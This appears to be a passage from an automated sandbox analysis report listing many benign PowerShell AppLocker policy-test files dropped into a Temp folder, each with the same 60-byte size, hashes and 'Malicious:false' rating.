                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4rb1cqn.twe.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arnmncsb.5zk.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axlizsqm.kv2.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bppjgg14.wr4.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_buk012tr.dv2.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccm5pyqv.u4n.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_codjyxnv.qol.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dajf0xm0.afw.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dg1be4kq.nme.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyorgqor.v0w.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0v3i04i.zuy.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5xmwznm.vb3.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gto41emw.0h2.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz5g4vix.t3d.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4mz1mql.kri.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5wshweu.zri.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ib202oxh.qud.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipwl5fce.n5z.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivaxgssq.aje.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1aylpqu.4zy.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrkmcxh1.vz1.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kntgxl4w.x20.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfdlf0b5.ghs.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
